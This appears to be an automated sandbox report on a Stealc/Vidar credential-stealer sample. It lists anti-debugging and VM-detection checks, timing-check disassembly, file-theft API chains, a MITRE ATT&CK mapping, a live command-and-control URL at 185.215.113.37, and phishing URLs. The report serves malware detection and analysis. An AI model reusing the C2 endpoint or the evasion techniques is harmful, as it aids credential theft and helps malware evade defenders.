Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD33AE second address: AD33C6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B08CB6D16h 0x00000008 jmp 00007F0B08CB6D1Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE2DD7 second address: AE2DEA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F0B09070BC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF586F second address: AF5873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF5873 second address: AF5883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F0B09070BC6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF5883 second address: AF58DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F0B08CB6D2Ch 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F0B08CB6D28h 0x00000013 jmp 00007F0B08CB6D1Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F0B08CB6D16h 0x00000020 jmp 00007F0B08CB6D1Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF5429 second address: AF542F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02DE3 second address: B02DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02DE7 second address: B02DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02DEB second address: B02DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jl 00007F0B08CB6D16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B06DAF second address: B06DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07079 second address: B0707D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B072F8 second address: B07307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007F0B09070BC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B08C77 second address: B08C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B08C7C second address: B08C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F0B09070BC6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0B09070BCFh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B08C9C second address: B08CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D26h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B08CB6 second address: B08CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B08CC4 second address: B08CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B08CCF second address: B08CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A2D2 second address: B0A2E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 js 00007F0B08CB6D16h 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0CD6D second address: B0CD73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0CD73 second address: B0CDA5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F0B08CB6D16h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dx, FC37h 0x00000013 push 00000004h 0x00000015 and edx, dword ptr [ebp+122D220Fh] 0x0000001b call 00007F0B08CB6D19h 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F0B08CB6D1Ch 0x00000028 jne 00007F0B08CB6D16h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0CDA5 second address: B0CDCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F0B09070BC8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0E8E7 second address: B0E8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0E43A second address: B0E44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0B09070BCEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0E44F second address: B0E46D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0B08CB6D28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0E46D second address: B0E481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B09070BCFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5150335 second address: 5150344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5150344 second address: 5150398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0B09070BCFh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F0B09070BD9h 0x0000000f and al, 00000006h 0x00000012 jmp 00007F0B09070BD1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F0B09070BCCh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5150398 second address: 515039E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 515039E second address: 51503A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5150432 second address: 5150469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov bl, al 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov dh, E2h 0x00000010 pushfd 0x00000011 jmp 00007F0B08CB6D1Ch 0x00000016 or esi, 4F35BFB8h 0x0000001c jmp 00007F0B08CB6D1Bh 0x00000021 popfd 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5150469 second address: 515046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 515046D second address: 5150473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32DCA second address: A32DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B09070BD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32DE2 second address: A32DE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 881AB3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A238D5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AB0A82 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_006338B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00634910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00634910
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0062DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0062DA80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0062E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0062E430
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00634570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00634570
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0062ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0062ED20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0062BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0062BE70
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0062DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0062DE10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006216D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00633EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00633EA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0062F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0062F6B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0062F68A FindFirstFileA, 0_2_0062F68A
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00621160 GetSystemInfo,ExitProcess, 0_2_00621160
                Source: file.exe, file.exe, 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: hgfst
                Source: file.exe, 00000000.00000002.2147145348.000000000134A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.0000000001376000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13687
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13684
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13706
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13698
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13738
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006245C0 VirtualProtect ?,00000004,00000100,00000000 0_2_006245C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00639860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00639860
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00639750 mov eax, dword ptr fs:[00000030h] 0_2_00639750
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00637850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00637850
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara match File source: Process Memory Space: file.exe PID: 5004, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00639600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00639600
                Source: file.exe, file.exe, 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: =Program Manager
                Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00637B90
                Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00636920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00636920
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00637850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00637850
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00637A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00637A30

                Stealing of Sensitive Information

                barindex
                Source: Yara match File source: 0.2.file.exe.620000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000003.2105418364.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 5004, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara match File source: 0.2.file.exe.620000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000003.2105418364.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 5004, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label
                file.exe | 55% | Virustotal |
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                s-part-0017.t-0009.fb-t-msedge.net | 0% | Virustotal |
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/ws | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.phpL | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.php7 | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phps | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpE | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpC | 17% | Virustotal |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.phpL | file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.phpE | file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.phpC | file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phps | file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php7 | file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1532905
                Start date and time:2024-10-14 06:52:05 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 8s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 18
                • Number of non-executed functions: 89
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                s-part-0017.t-0009.fb-t-msedge.net | https://verfiy-blue-badge-sign-up.vercel.app/ | malicious | HTMLPhisher | 13.107.253.45
                | https://shaw-104167.square.site/ | malicious | HTMLPhisher | 13.107.253.45
                | https://attmailmanagementupdates2024.weebly.com/ | malicious | HTMLPhisher | 13.107.253.45
                | https://business.helpcaseappealcenter.eu/community-standard/346299132520232 | malicious | Unknown | 13.107.253.45
                | http://bervokter-pdf.vercel.app/ | malicious | HTMLPhisher | 13.107.253.45
                | https://shawcawebmailserver.weebly.com/ | malicious | HTMLPhisher | 13.107.253.45
                | https://shaw-104167.square.site/ | malicious | HTMLPhisher | 13.107.253.45
                | https://businesssupport248.mfb72024.click/ | malicious | Unknown | 13.107.253.45
                | https://tzr7wtjq.r.us-east-1.awstrack.me/L0/https:%2F%2Fclickproxy.retailrocket.net%2F%3Furl=https%253A%252F%252Fneamunit.ro%2F%2Fwinners%2F%2Fnatalie.gilbert%2FbmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001927b41f2f4-541067bc-8926-4dcb-8f02-24fcf186dd1a-000000/pqvbHhvZKuWAqkc2J1BWoU1pciA=395 | malicious | HTMLPhisher | 13.107.253.45
